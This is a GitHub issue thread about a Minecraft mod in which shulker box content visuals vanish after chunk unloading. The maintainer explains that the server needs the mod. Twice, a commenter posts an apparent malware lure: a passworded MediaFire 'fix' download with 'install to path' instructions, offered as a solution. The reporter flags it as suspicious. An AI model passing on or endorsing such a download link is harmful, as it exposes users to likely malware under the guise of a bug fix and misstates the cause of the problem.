### ISSUE TITLE
Visuals on shulker boxes disappear if chunks they are in are unloaded.

### ISSUE THREAD

**Issue by ironik42** [henkelmax/peek#35]
### Bug description

When I open a shulker with only one item type in it, it shows the visual on the outside of the shulker box. However, if the chunks they are in are unloaded, the visuals disappear until I open the shulker box again. Same goes for renamed shulker boxes.

### Minecraft version

1.21

### Mod version

1.20.x

### Mod loader and version

Fabric Loader 0.15.11

### Steps to reproduce

Open shulker box to get visual of contents to appear on the outside of the box.
Unload the chunk that shulker box is placed in.
Go back to shulker box. Visual is now gone.
Re-open shulker box to get visual back.

### Expected behavior

I expected the visual for a shulker box to remain after unloading a chunk and returning to it without having to re-open the shulker box.

### Log files

https://gist.github.com/ironik42/5461ac5c0db90a62d1c7fd7183f5fffe

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by ironik42** [comment]
This seems suspicious....

**Comment by henkelmax** [comment]
Yes, thats completely normal, since servers without the mod don't send the contents of shulkers. Install the mod on the server and it will always show.
